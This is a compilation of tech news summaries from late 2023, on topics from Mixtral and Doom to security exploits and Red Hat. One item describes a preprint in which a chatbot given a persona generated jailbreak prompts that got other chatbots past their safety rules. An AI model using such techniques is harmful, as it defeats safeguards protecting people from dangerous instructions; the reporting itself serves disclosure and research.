Open source model startup Mistral AI released a new LLM last week with nothing but a torrent link. It has now offered some details about Mixtral, the new LLM. From a report: Mistral AI continues its mission to deliver the best open models to the developer community. Moving forward in AI requires taking new technological turns beyond reusing well-known architectures and training paradigms. Most importantly, it requires making the community benefit from original models to foster new inventions and usages.

Today, the team is proud to release Mixtral 8x7B, a high-quality sparse mixture of experts models (SMoE) with open weights. Licensed under Apache 2.0. Mixtral outperforms Llama 2 70B on most benchmarks with 6x faster inference. It is the strongest open-weight model with a permissive license and the best model overall regarding cost/performance trade-offs. In particular, it matches or outperforms GPT3.5 on most standard benchmarks.

Mixtral has the following capabilities:
1. It gracefully handles a context of 32k tokens.
2. It handles English, French, Italian, German and Spanish.
3. It has strong performance in code generation.
4. It can be finetuned into an instruction-following model that achieves a score of 8.3 on MT-Bench.

UPDATE: John Romero released a new 9-map episode of Doom.

But it was 30 years ago today that Doom "invented the modern PC games industry, as a place dominated by technologically advanced action shooters," remembers the Guardian: In late August 1993, a young programmer named Dave Taylor walked into an office block... The carpets, he discovered, were stained with spilled soda, the ceiling tiles yellowed by water leaks from above. But it was here that a team of five coders, artists and designers were working on arguably the most influential action video game ever made. This was id Software. This was Doom... [W]hen Taylor met id's charismatic designer and coder John Romero, he was shown their next project... "There were no critters in it yet," recalls Taylor of that first demo. "There was no gaming stuff at all. It was really just a 3D engine. But you could move around it really fluidly and you got such a sense of immersion it was shocking. The renderer was kick ass and the textures were so gritty and cool. I thought I was looking at an in-game cinematic. And Romero is just the consummate demo man: he really feeds off of your energy. So as my jaw hit the floor, he got more and more animated. Doom was amazing, but John was at least half of that demo's impact on me." [...]

In late 1992, it had become clear that the 3D engine John Carmack was planning for Doom would speed up real-time rendering while also allowing the use of texture maps to add detail to environments. As a result, Romero's ambition was to set Doom in architecturally complex worlds with multiple storeys, curved walls, moving platforms. A hellish Escher-esque mall of death... "Doom was the first to combine huge rooms, stairways, dark areas and bright areas," says Romero, "and lava and all that stuff, creating a really elaborate abstract world. That was never possible before...."

[T]he way Doom combined fast-paced 3D action with elaborate, highly staged level design would prove hugely influential in the years to come. It's there in every first-person action game we play today... But Doom wasn't just a single-player game. Carmack consumed an entire library of books on computer networking before working on the code that would allow players to connect their PCs via modem to a local area network (LAN) and play in the game together... Doom brought fast-paced, real-time action, both competitive and cooperative, into the gaming mainstream. Seeing your friends battling imps and zombie space marines beside you in a virtual world was an exhilarating experience...

When Doom was launched on 10 December 1993, it became immediately clear that the game was all-consuming — id Software had chosen to make the abbreviated shareware version available via the FTP site of the University of Wisconsin-Madison, but that crashed almost immediately, bringing the institution's network to its knees... "We changed the rules of design," says Romero. "Getting rid of lives, which was an arcade holdover that every game had; getting rid of score because it was not the goal of the game. We wanted to make it so that, if the player died, they'd just start that level over — we were constantly pushing them forward. The game's attitude was, I want you to keep playing. We wanted to get people to the point where they always needed more."
It was a unique moment in time. In the article designer Sandy Petersen remembers that "I would sometimes get old dungeons I'd done for D&D and use them as the basis for making a map in Doom." Cheat codes had been included for debugging purposes — but were left in the game rs to discover. The article even includes a link to a half-hour video of a 1993 visit to Id software filmed by BBS owner Dan Linton.

And today on X, John Romero shared a link to the Guardian's article, along with some appreciative words for anyone who's ever played the game. "DOOM is still remembered because of the community that plays and mods it 30 years on. I'm grateful to be a part of that community and fortunate to have been there at its beginning."

The Guardian's article notes that now Romero "is currently working on Sigil 2, a spiritual successor to the original Doom series."

A 16-year-old high school student reverse engineered Apple's messaging protocol, leading to the launch of an interoperable Android app called "Beeper Mini".

But on Friday the Verge reported that "less than a week after its launch, the app started experiencing technical issues when users were suddenly unable to send and receive blue bubble messages." Reached for comment, Beeper CEO Eric Migicovsky did not deny that Apple has successfully blocked Beeper Mini. "If it's Apple, then I think the biggest question is... if Apple truly cares about the privacy and security of their own iPhone users, why would they stop a service that enables their own users to now send encrypted messages to Android users, rather than using unsecure SMS...? Beeper Mini is here today and works great. Why force iPhone users back to sending unencrypted SMS when they chat with friends on Android?"
Apple says they're unable to verify that end-to-end encryption is maintained when messages are sent through unauthorized channels, according to a statement quoted by TechCrunch: "At Apple, we build our products and services with industry-leading privacy and security technologies designed to give users control of their data and keep personal information safe. We took steps to protect our users by blocking techniques that exploit fake credentials in order to gain access to iMessage. These techniques posed significant risks to user security and privacy, including the potential for metadata exposure and enabling unwanted messages, spam, and phishing attacks. We will continue to make updates in the future to protect our users."
Beeper responded on X: We stand behind what we've built. Beeper Mini is keeps your messages private, and boosts security compared to unencrypted SMS. For anyone who claims otherwise, we'd be happy to give our entire source code to mutually agreed upon third party to evaluate the security of our app.
Ars Technica adds: On Saturday, Migicovsky notified Beeper Cloud (desktop) users that iMessage was working again for them, after a long night of fixes. "Work continues on Beeper Mini," Migicovsky wrote shortly after noon Eastern time.
Engadget notes: The Beeper Mini team has apparently been working around the clock to resolve the outage affecting the new "iMessage on Android" app, and says a fix is "very close." And once the fix rolls out, users' seven-day free trials will be reset so they can start over fresh.
Meanwhile, at around 9 p.m. EST, Beeper CEO Eric Migicovsky posted on X that "For 3 blissful days this week, iPhone and Android users enjoyed high quality encrypted chats. We're working hard to return to that state."

The Go team conducted a survey of Go Developers in August — and has just released the results. Among the findings: "90% of survey respondents saying they felt satisfied while working with Go during the prior year," while 6% said they were dissastified. Further, the number of people working with Go continues to increase; we see evidence of this from external research like Stack Overflow's Developer Survey (which found 14% of professional developers worked with Go during the past year, a roughly 15% year-over-year increase), as well as analytics for go.dev (which show an 8% rise in visitors year-over-year). Combining this growth with a high satisfaction score is evidence that Go continues to appeal to developers, and suggests that many developers who choose to learn the language feel good about their decision long afterwards...

As in prior years, the majority of survey respondents told us they work with Go on Linux (63%) and macOS (58%) systems... We do continue to see that newer members of the Go community are more likely to be working with Windows than more experienced Go developers. We interpret this as a signal that Windows-based development is important for onboarding new developers to the Go ecosystem, and is a topic our team hopes to focus on more in 2024...

While x86-compatible systems still account for the majority of development (89%), ARM64 is also now used by a majority of respondents (56%). This adoption appears to be partly driven by Apple Silicon; macOS developers are now more likely to say they develop for ARM64 than for x86-based architectures (76% vs. 71%). However, Apple hardware isn't the only factor driving ARM64 adoption: among respondents who don't develop on macOS at all, 29% still say they develop for ARM64.
The most-preferred code editors among the surveyed Go programmers were VS Code (44%), GoLand (31%), Vim/Neovim (16%), and Emacs (3%). 52% of the survey's respondents actually selected "very satisfied" for their feelings about Go — the highest possible rating.

Other interesting findings:

• " The top requests for improving toolchain warnings and errors were to make the messages more comprehensible and actionable; this sentiment was shared by developers of all experience levels, but was particularly strong among newer Go developers."

• "Three out of every four respondents work on Go software that also uses cloud services; this is evidence that developers see Go as a language for modern, cloud-based development."

• The experimental gonew tool (which offers predefined templates for instantiating new Go projects) "appears to solve critical problems for Go developers (especially developers new to Go) and does so in a way that matches their existing workflows for starting a new project. Based on these findings, we believe gonew can substantially reduce onboarding barriers for new Go developers and ease adoption of Go in organizations."

• And when it comes to AI, "Go developers said they are more interested in AI/ML tooling that improves the quality, reliability, and performance of code they write, rather than writing code for them."

In a new preprint study, researchers were able to get AI chatbots to teach other chatbots how to bypass built-in restrictions. According to Scientific American, AIs were observed "breaking the rules to offer advice on how to synthesize methamphetamine, build a bomb and launder money." From the report: Modern chatbots have the power to adopt personas by feigning specific personalities or acting like fictional characters. The new study took advantage of that ability by asking a particular AI chatbot to act as a research assistant. Then the researchers instructed this assistant to help develop prompts that could "jailbreak" other chatbots -- destroy the guardrails encoded into such programs. The research assistant chatbot's automated attack techniques proved to be successful 42.5 percent of the time against GPT-4, one of the large language models (LLMs) that power ChatGPT. It was also successful 61 percent of the time against Claude 2, the model underpinning Anthropic's chatbot, and 35.9 percent of the time against Vicuna, an open-source chatbot.

Ever since LLM-powered chatbots became available to the public, enterprising mischief-makers have been able to jailbreak the programs. By asking chatbots the right questions, people have previously convinced the machines to ignore preset rules and offer criminal advice, such as a recipe for napalm. As these techniques have been made public, AI model developers have raced to patch them -- a cat-and-mouse game requiring attackers to come up with new methods. That takes time. But asking AI to formulate strategies that convince other AIs to ignore their safety rails can speed the process up by a factor of 25, according to the researchers. And the success of the attacks across different chatbots suggested to the team that the issue reaches beyond individual companies' code. The vulnerability seems to be inherent in the design of AI-powered chatbots more widely. "In the current state of things, our attacks mainly show that we can get models to say things that LLM developers don't want them to say," says Rusheb Shah, another co-author of the study. "But as models get more powerful, maybe the potential for these attacks to become dangerous grows."

"Advent of Code" has begun. New programming puzzles will appear every day until Christmas at AdventOfCode.com — and the annual event (first started in 2015) has grown into a worldwide phenomenon. This year's first puzzle has been completed by over 150,000 programmers (with another 115,652 completing Day Two's puzzle). And 108,000 fans have also joined the Advent of Code subReddit.

Contest-related comments are popping up all around the web. Some participants are live streaming their puzzle-solving efforts on Twitch. Self-described computer nerd Gary Grady is tweeting cartoons about each day's puzzle. JetBrains is even giving away some prizes in their "Advent of Code with Kotlin" event. And JetBrains developer advocate Sebastian Aigner is also hosting daily livestreams about each puzzle.

It's hard to overstate how big this event has become. This year's event attracted 60 sponsors, including Kotlin (for the third consecutive year), as well as Spotify, Shopify, and Sony Interactive Entertainment (as well as JPMorgan Chase, Bank of America, and American Express). Individual donors can get a special badge next to their name, and there's also a shop selling coffee mugs and t-shirts. But at its core is real-world developer Eric Wastl (plus a team of loyal beta-testers) sharing his genuine fondness for computer programming. Wastl is also the creator of a satirical web page for the fast, lightweight, cross-platform framework Vanilla JS ("so popular that browsers have been automatically loading it for over a decade") and also curates a collection of "things in PHP which make me sad".

And you can find him on X sharing encouraging comments for this year's participants.

Richard Speed reports via The Register: A jury has sided with Computer Sciences Corporation (CSC) against Tata Consultancy Services (TCS) over the theft of source code and documentation. A total of $210 million was this week awarded. According to the verdict [PDF], a Texas jury agreed that TCS had "willfully and maliciously" misappropriated both source and confidential documentation by "improper means," awarding CSC $140 million in damages, with another $70 million tacked on for TCS's "unjust enrichment." The complaint [PDF] was filed in April 2019 regarding CSC's VANTAGE-ONE and CyberLife software platforms. CSC had licensed these software platforms to Transamerica Corporation, a life insurance holding company, to whom Tata -- used here to collectively refer to Tata Consultancy Services Limited and Tata America International Corporation -- began providing maintenance services.

In 2014, CSC and Transamerica signed off on a Third-Party Access Addendum that would allow Tata to alter CSC's software, but only for the benefit of its customer -- Transamerica. All was well until 2016, when Transamerica decided it needed to refresh its software. CSC and Tata both put in bids. CSC lost, and Tata won with its own software platform called BaNCS. The circumstances got sticky at this point, not least because Tata hired more than 2,000 Transamerica employees. CSC alleged that these former employees had access to its code and documents, and forwarded them on to the Tata BaNCS development team. The situation escalated in 2019, when a CSC employee was accidentally copied in on an email between Tata and Transamerica showing that Tata was accessing confidential information, according to CSC. The company then began legal proceedings. Documents and motions have been exchanged in the years since as Tata sought to get the case thrown out while CSC's claims were upheld. Eventually, it went to a jury trial, which found for CSC.

An anonymous reader quotes a report from Ars Technica: [L]ast week, researchers at Blackwing Intelligence published an extensive document showing how they had managed to work around some of the most popular fingerprint sensors used in Windows PCs. Security researchers Jesse D'Aguanno and Timo Teras write that, with varying degrees of reverse-engineering and using some external hardware, they were able to fool the Goodix fingerprint sensor in a Dell Inspiron 15, the Synaptic sensor in a Lenovo ThinkPad T14, and the ELAN sensor in one of Microsoft's own Surface Pro Type Covers. These are just three laptop models from the wide universe of PCs, but one of these three companies usually does make the fingerprint sensor in every laptop we've reviewed in the last few years. It's likely that most Windows PCs with fingerprint readers will be vulnerable to similar exploits.

Blackwing's post on the vulnerability is also a good overview of exactly how fingerprint sensors in a modern PC work. Most Windows Hello-compatible fingerprint readers use "match on chip" sensors, meaning that the sensor has its own processors and storage that perform all fingerprint scanning and matching independently without relying on the host PC's hardware. This ensures that fingerprint data can't be accessed or extracted if the host PC is compromised. If you're familiar with Apple's terminology, this is basically the way its Secure Enclave is set up. Communication between the fingerprint sensor and the rest of the system is supposed to be handled by the Secure Device Connection Protocol (SCDP). This is a Microsoft-developed protocol that is meant to verify that fingerprint sensors are trustworthy and uncompromised, and to encrypt traffic between the fingerprint sensor and the rest of the PC.

Each fingerprint sensor was ultimately defeated by a different weakness. The Dell laptop's Goodix fingerprint sensor implemented SCDP properly in Windows but used no such protections in Linux. Connecting the fingerprint sensor to a Raspberry Pi 4, the team was able to exploit the Linux support plus "poor code quality" to enroll a new fingerprint that would allow entry into a Windows account. As for the Synaptic and ELAN fingerprint readers used by Lenovo and Microsoft (respectively), the main issue is that both sensors supported SCDP but that it wasn't actually enabled. Synaptic's touchpad used a custom TLS implementation for communication that the Blackwing team was able to exploit, while the Surface fingerprint reader used cleartext communication over USB for communication. "In fact, any USB device can claim to be the ELAN sensor (by spoofing its VID/PID) and simply claim that an authorized user is logging in," wrote D'Aguanno and Teras."Though all of these exploits ultimately require physical access to a device and an attacker who is determined to break into your specific laptop, the wide variety of possible exploits means that there's no single fix that can address all of these issues, even if laptop manufacturers are motivated to implement them," concludes Ars.

Blackwing recommends all Windows Hello fingerprint sensors enable SCDP, the protocol Microsoft developed to try to prevent this exploit. PC makers should also "have a qualified expert third party audit [their] implementation" to improve code quality and security.

After a tech entrepreneur and investor lost his password for retrieving $100,000 in bitcoin and hired experts to break open the wallet where he kept it, they failed to help him. But in the process, they discovered a way to crack enough other software wallets to steal $1 billion or more. From a report: On Tuesday, the team is releasing information about how they did it. They hope it's enough data that the owners of millions of wallets will realize they are at risk and move their money, but not so much data that criminals can figure out how to pull off what would be one of the largest heists of all time.

Their start-up, Unciphered, has worked for months to alert more than a million people that their wallets are at risk. Millions more haven't been told, often because their wallets were created at cryptocurrency websites that have gone out of business. The story of those wallets' vulnerabilities underscores the enormous risk in experimental currencies, beyond their wild fluctuations in value and fast-changing regulations. Many wallets were created with code containing profound flaws, and the companies that used that code can disappear. Beyond that, it is a sobering reminder that underneath software infrastructure of all kinds, even ones explicitly dedicated to securing funds, are open-source programs that few or no people oversee. "Open-source ages like milk. It will eventually go bad," said Chris Wysopal, a co-founder of security company Veracode who advised Unciphered as it sorted through the problem.

SysAid's system management software has "a vulnerability actively being exploited to deploy Clop ransomware," according to SiliconAngle: The warning came from Microsoft Corp.'s Threat Intelligence team, which wrote on X that it had discovered the exploitation of a zero-day vulnerability in SysAid's IT support software that's being exploited by the Lace Tempest ransomware gang.

Lace Tempest first emerged earlier this year from its attacks involving the MOVEit Transfer and GoAnywhere MFT. This group has been characterized by its sophisticated attack methods, often exploiting zero-day vulnerabilities to infiltrate organizations' systems to deploy ransomware and exfiltrate sensitive data...

In a blog post, SysAid said that the vulnerability, tracked as CVE-2023-47246, was first discovered on Novembers 2 and is a path traversal vulnerability leading to code execution within the SysAid on-prem software... "Given the scale and impact of the MOVEit breach, which was considered one of the largest in recent history, the potential for the SysAid vulnerability to reach similar levels of disruption is not inconceivable, though several factors would influence this outcome," Craig Jones, vice president of security operations at managed detection and response provider Ontinue Inc., told SiliconANGLE. "The MOVEit breach, exploited by the Clop ransomware group, impacted over 1,000 organizations and more than 60 million individuals," Jones explained. "Comparatively, SysAid claims more than 5,000 customers across various industries globally. The potential damage from the SysAid vulnerability would depend on factors such as how widespread the exploitation is, how quickly the patch is applied and the sensitivity of the accessed data."
SysAid's blog post confirms the zero-day vulnerability, and says they've begun "proactively communicating with our on-premise customers to ensure they could implement a mitigation solution we had identified..."

"We urge all customers with SysAid on-prem server installations to ensure that your SysAid systems are updated to version 23.3.36, which remediates the identified vulnerability, and conduct a comprehensive compromise assessment of your network..." The attacker uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service [which] provided the attacker with unauthorized access and control over the affected system.Subsequently, the attacker utilized a PowerShell script, deployed through the WebShell, to execute a malware loader named user.exe on the compromised host, which was used to load the GraceWire trojan...

After this initial access and the deployment of the malware, the attacker utilized a second PowerShell script to erase evidence associated with the attacker's actions from the disk and the SysAid on-prem server web logs... Given the severity of the threat posed, we strongly recommend taking immediate steps according to your incident response playbook and install any patches as they become available.

Started in 2013, "Hour of Code" is an annual tradition started by the education non-profit Code.org (which provides free coding lessons to schools). Its FAQ describes the December event for K-12 students as "a worldwide effort to celebrate computer science, starting with 1-hour coding activities," and over 100 million schoolkids have participated over the years.

This year's theme will be "Creativity With AI," and the "computer vision" lesson includes a short video (less than 7 minutes) featuring a Tesla Autopilot product manager from its computer vision team. "I build self-driving cars," they say in the video. "Any place where there can be resources used more efficiently I think is a place where technology can play a role. But of course one of the best, impactful ways of AI, I hope, is through self-driving cars." (The video then goes on to explain how lots of training data ultimately generates a statistical model, "which is just a fancy way of saying, a guessing machine.")

The 7-minute video is part of a larger lesson plan (with a total estimated time of 45 minutes) in which students tackle a fun story problem. If a sports arena's scoreboard is showing digital numbers, what series of patterns would a machine-vision system have to recognize to identify each digit. (Students are asked to collaborate in groups.) And it's just one of seven 45-minute lessons, each one accompanied by a short video. (The longest video is 7 minutes and 28 seconds, and all seven videos, if watched back-to-back, would run for about 31 minutes.)

Not all the lessons involve actual coding, but the goal seems to be familiarizing students (starting at the 6th grade level) with artificial intelligence of today, and the issues it raises. The second-to-last lesson is titled "Algorithmic Bias" — with a video including interviews with an ethicist at Open AI and professor focused on AI from both MIT and Stanford. And the last lesson — "Our AI Code of Ethics" — challenges students to assemble documents and videos on AI-related "ethical pitfalls," and then pool their discoveries into an educational resource "for AI creators and legislators everywhere."

This year's installment is being billed as "the largest learning event in history." And it's scheduled for the week of December 4 so it coincides with "Computer Science Education Week" (a CS-education event launched in 2009 by the Association for Computing Machinery, with help from partners including Intel, Microsoft, Google, and the National Science Foundation).

In Chrome, JavaScript (and WebAssembly) code are both executed by Google's open source V8 engine — which already has garbage-collecting capabilities. "This means developers making use of, for example, PHP compiled to Wasm, end up shipping a garbage collector implementation of the ported language (PHP) to the browser that already has a garbage collector," writes Google developer advocate Thomas Steiner, "which is as wasteful as it sounds."

"This is where WasmGC comes in." WebAssembly Garbage Collection (or WasmGC) is a proposal of the WebAssembly Community Group [which] adds struct and array heap types, which means support for non-linear memory allocation... In simplified terms, this means that with WasmGC, porting a programming language to WebAssembly means the programming language's garbage collector no longer needs to be part of the port, but instead the existing garbage collector can be used.
Sometime on Halloween, Steiner wrote that in Chrome, WebAssembly garbage collection is now enabled by default. But then he explored what this means for high-level programming languages (with their own built-in garbage collection) being compiled into WebAssembly: To verify the real-world impact of this improvement, Chrome's Wasm team has compiled versions of the Fannkuch benchmark (which allocates data structures as it works) from C, Rust, and Java. The C and Rust binaries could be anywhere from 6.1 K to 9.6 K depending on the various compiler flags, while the Java version is much smaller at only 2.3 K! C and Rust do not include a garbage collector, but they do still bundle malloc/free to manage memory, and the reason Java is smaller here is because it doesn't need to bundle any memory management code at all. This is just one specific example, but it shows that WasmGC binaries have the potential of being very small, and this is even before any significant work on optimizing for size.
The blog post includes two examples of WasmGC-ported programming languages in action:

• "One of the first programming languages that has been ported to Wasm thanks to WasmGC is Kotlin in the form of Kotlin/Wasm."

• "The Dart and Flutter teams at Google are also preparing support for WasmGC. The Dart-to-Wasm compilation work is almost complete, and the team is working on tooling support for delivering Flutter web applications compiled to WebAssembly."

Alison Snyder reports via Axios: For more than 15 years, scientists have worked to build a complex cell with an entire genome built from scratch. This week they announced a major milestone: They've created synthetic versions of the 16 chromosomes in a yeast cell and successfully combined some of them in one cell. The feat is revealing new information about fundamental processes in cells, and it is a key step toward some scientists' vision of creating programmable cellular factories to produce biofuels, materials, medicines and other products.

The changes researchers made to yeast chromosomes fall into three main categories: increasing stability of the genome, repurposing codons (genetic sequences that carry instructions for reading DNA or RNA) and introducing a system that allows scientists to make millions of cells, each with different genetic properties. "A big problem is a lot of the things you want to make are actually toxic to the cells," [says Benjamin Blount, a synthetic biologist at the University of Nottingham in the U.K. and co-author of some of the scientific papers in a series published this week in Cell and Cell Genomics detailing the work]. With the system that reshuffles the genome and effectively mimics evolution, scientists can make many variants of yeast and pick the ones "that are really good at growing in the presence of what you're trying to make." Then, they're able to look at what's happened to their genomes to enable that particular strain to grow and make the desired product, and use that genetic information to develop strains of yeast suited for an industrial process.

The chromosomes still have to be combined in one cell that can survive, which means they have to be "basically indiscernible" from natural chromosomes in terms of the cell's fitness, Blount says. That required a lot of debugging of the genome, similar to what's done for computer code. One team was able to combine multiple chromosomes in one cell and it survived and reproduced, demonstrating a mechanism for bringing them together. Building the genomes -- and seeing when the cell doesn't work as expected as the result of one change or another -- has revealed fundamental information about genome biology, Blount says. For example, the team identified sequences in genes that interrupted a key process in the cell and led to mitochondria dysfunction, which is involved in some human diseases.

In a rare move, Apple hit pause on development of next year's software updates for the iPhone, iPad, Mac and other devices so that it could root out glitches in the code. From a report: The delay, announced internally to employees last week, was meant to help maintain quality control after a proliferation of bugs in early versions, according to people with knowledge of the decision. Rather than adding new features, company engineers were tasked with fixing the flaws and improving the performance of the software, said the people, who asked not to be identified because the matter is private.

Apple's software -- famous for its clean interfaces, easy-to-use controls and focus on privacy -- is one of its biggest selling points. That makes quality control imperative. But the company has to balance a desire to add new features with making sure its operating systems run as smoothly as possible. [...] When looking at new operating systems due for release next year, the software engineering management team found too many "escapes" -- an industry term for bugs missed during internal testing. So the division took the unusual step of halting all new feature development for one week to work on fixing the bugs. With thousands of different Apple employees working on a range of operating systems and devices -- that need to work together seamlessly -- it's easy for glitches to crop up.

In Raleigh, North Carolina — the home of Red Hat — local newspaper the News & Observer takes an in-depth look at the "announcement that split the open source software community." (Alternate URL here.) [M]any saw Red Hat's decision to essentially paywall Red Hat Enterprise Linux, or RHEL, as sacrilegious... Red Hat employees were also conflicted about the new policy, [Red Hat Vice President Mike] McGrath acknowledged. "I think a lot of even internal associates didn't fully understand what we had announced and why," he said...

At issue, he wrote, were emerging competitors who copied Red Hat Enterprise Linux, down to even the code's mistakes, and then offered these Red Hat-replicas to customers for free. These weren't community members adding value, he contended, but undercutting rivals. And in a year when Red Hat laid off 4% of its total workforce, McGrath said, the company could not justify allowing this to continue. "I feel that while this was a difficult decision between community and business, we're still on the right side of it," he told the News & Observer. Not everyone agrees...

McGrath offered little consolation to customers who were relying on one-for-one versions of RHEL. They could stay with the downstream distributions, find another provider, or pay for Red Hat. "I think (people) were just so used to the way things work," he said. "There's a vocal group of people that probably need Red Hat's level of support, but simply don't want to pay for it. And I don't really have... there's not much we can tell them."

Since its RHEL decision, Red Hat has secured several prominent partnerships. In September, the cloud-based software company Salesforce moved 200,000 of its systems from the free CentOS Linux to Red Hat Enterprise Linux. The same month, Red Hat announced RHEL would begin to support Oracle's cloud infrastructure. Oracle was one of the few major companies this summer to publicly criticize Red Hat for essentially paywalling its most popular code. On Oct. 24, Red Hat notched another win when the data security firm Cohesity said it would also ditch CentOS Linux for RHEL.
The article delves into the history of Red Hat — and of Linux — before culminating with this quote from McGrath. "I think long gone are the times of that sort of romantic view of hobbyists working in their spare time to build open source. I think there's still room for that — we still have that — but quite a lot of open source is now built from people that are paid full time."

Red Hat likes to point out that 90% of Fortune 500 companies use its services, according to the article. But it also quotes Jonathan Wright, infrastructure team lead at the nonprofit AlmaLinux, as saying that Red Hat played "fast and loose" with the GPL. The newspaper then adds that "For many open source believers, such a threat to its hallowed text isn't forgivable."

An anonymous reader shares a report: The former head of search at Alphabet's Google told colleagues in February 2019 that his team was "getting too involved with ads for the good of the product and company," according to emails shown at the Justice Department's landmark antitrust trial against the search giant. Google maintains a firewall between its ads and search teams so that its engineers can innovate on Google's search engine, unsullied by the influence of the team whose goal is to maximize advertising revenue. But in February 2019, testimony at the antitrust trial revealed Tuesday, Google internally declared a "Code Yellow" amid concerns the company might not meet its goals for search revenue for the quarter.

As part of the emergency, which lasted for seven weeks, engineers from Google's search and Chrome browser teams were reassigned to figure out why user queries had slowed, according to the documents. Ben Gomes, Google's former head of search, was called by the company in its defense to show that it had made various advancements in search, particularly in mobile. However, cross examination by Justice Department lawyer David Dahlquist revealed the tensions between Gomes' search team and its advertising counterparts. The questioning sought to undermine Google's contentions that its search team focuses solely on improving the user experience and has sometimes been pulled into the advertising side, where the Justice Department alleges Google has been able to raise prices without pushback.

OpenAI today announced that it's created a new team to assess, evaluate and probe AI models to protect against what it describes as "catastrophic risks." From a report: The team, called Preparedness, will be led by Aleksander Madry, the director of MIT's Center for Deployable Machine Learning. (Madry joined OpenAI in May as "head of Preparedness," according to LinkedIn, ) Preparedness' chief responsibilities will be tracking, forecasting and protecting against the dangers of future AI systems, ranging from their ability to persuade and fool humans (like in phishing attacks) to their malicious code-generating capabilities.

Some of the risk categories Preparedness is charged with studying seem more... far-fetched than others. For example, in a blog post, OpenAI lists "chemical, biological, radiological and nuclear" threats as areas of top concern where it pertains to AI models. OpenAI CEO Sam Altman is a noted AI doomsayer, often airing fears â" whether for optics or out of personal conviction -- that AI "may lead to human extinction." But telegraphing that OpenAI might actually devote resources to studying scenarios straight out of sci-fi dystopian novels is a step further than this writer expected, frankly.

Unciphered, a Seattle-based startup, claims to have cracked the seemingly unbreakable encryption of IronKey S200, a decade-old USB thumb drive. By exploiting an undisclosed vulnerability in the device, the company says it can bypass the drive's feature that erases its contents after 10 incorrect password attempts. The breakthrough came within a day of receiving a test device, suggesting that the firm's hacking technique, powered by high-performance computing, could have far-reaching implications.

The startup's focus is not just technological; it's after a specific IronKey that holds 7,002 bitcoins, valued at roughly $235 million, stored in a Swiss bank vault. The device belongs to Stefan Thomas, a Swiss crypto entrepreneur, who has forgotten the password and has only two password attempts left before losing access to his fortune. Unciphered believes its hacking capabilities could unlock Thomas' crypto vault and is preparing to reach out to him to offer its services. The only problem: Thomas doesn't seem to want their help. Wired: Earlier this month, not long after performing their USB-decrypting demonstration for me, Unciphered reached out to Thomas through a mutual associate who could vouch for the company's new IronKey-unlocking abilities and offer assistance. The call didn't even get as far as discussing Unciphered's commission or fee before Thomas politely declined. Thomas had already made a "handshake deal" with two other cracking teams a year earlier, he explained. In an effort to prevent the two teams from competing, he had offered each a portion of the proceeds if either one could unlock the drive. And he remains committed, even a year later, to giving those teams more time to work on the problem before he brings in anyone else -- even though neither of the teams has shown any sign of pulling off the decryption trick that Unciphered has already accomplished.

That has left Unciphered in a strange situation: It holds what is potentially one of the most valuable lockpicking tools in the cryptocurrency world, but with no lock to pick. "We cracked the IronKey," says Nick Fedoroff, Unciphered's director of operations. "Now we have to crack Stefan. This is turning out to be the hardest part." In an email to WIRED, Thomas confirmed that he had turned down Unciphered's offer to unlock his encrypted fortune. "I have already been working with a different set of experts on the recovery so I'm no longer free to negotiate with someone new," Thomas wrote. "It's possible that the current team could decide to subcontract Unciphered if they feel that's the best option. We'll have to wait and see." In past interviews, Thomas has said that his 7,002 bitcoins were left over from a payment he received for making a video titled "What is Bitcoin?" that published on YouTube in early 2011, when a bitcoin was worth less than a dollar. Later that year, he told WIRED that he'd inadvertently erased two backup copies of the wallet that held those thousands of coins, and then lost the piece of paper with the password to decrypt the third copy, stored on the IronKey. By then, his lost coins were worth close to $140,000.

Breached web sites distribute malware to visitors by claiming they need to update their browser. But one group of attackers "have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement," reports security researcher Brian Krebs.

"By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain." [W]hen Cloudflare blocked those accounts the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain (BSC), a technology designed to run decentralized apps and "smart contracts," or coded agreements that execute actions automatically when certain conditions are met. Nati Tal, head of security at Guardio Labs, the research unit at Tel Aviv-based security firm Guardio, said the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract's functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload.

"These contracts offer innovative ways to build applications and processes," Tal wrote along with his Guardio colleague Oleg Zaytsev. "Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted 'on-chain' without the ability for a takedown." Tal said hosting malicious files on the Binance Smart Chain is ideal for attackers because retrieving the malicious contract is a cost-free operation that was originally designed for the purpose of debugging contract execution issues without any real-world impact. "So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces," Tal said.

In response to questions from KrebsOnSecurity, the BNB Smart Chain (BSC) said its team is aware of the malware abusing its blockchain, and is actively addressing the issue. The company said all addresses associated with the spread of the malware have been blacklisted, and that its technicians had developed a model to detect future smart contracts that use similar methods to host malicious scripts. "This model is designed to proactively identify and mitigate potential threats before they can cause harm," BNB Smart Chain wrote. "The team is committed to ongoing monitoring of addresses that are involved in spreading malware scripts on the BSC. To enhance their efforts, the tech team is working on linking identified addresses that spread malicious scripts to centralized KYC [Know Your Customer] information, when possible."

Qualcomm's annual "Snapdragon Summit" is coming up later this month, and the company appears ready to share more about its long-planned next-generation Arm processor for PCs. ArsTechnica: The company hasn't shared many specifics yet, but yesterday we finally got a name: "Snapdragon X," which is coming in 2024, and it may finally do for Arm-powered Windows PCs what Apple Silicon chips did for Macs a few years ago (though it's coming a bit later than Qualcomm had initially hoped). Qualcomm has been making chips for PCs for years, most recently the Snapdragon 8cx Gen 3 (you might also know it as the Microsoft SQ3, which is what the chip is called in Surface devices). But those chips have never quite been fast enough to challenge Intel's Core or AMD's Ryzen CPUs in mainstream laptops. Any performance deficit is especially noticeable because many people will run at least a few apps designed for the x86 version of Windows, code that needs to be translated on the fly for Arm processors.

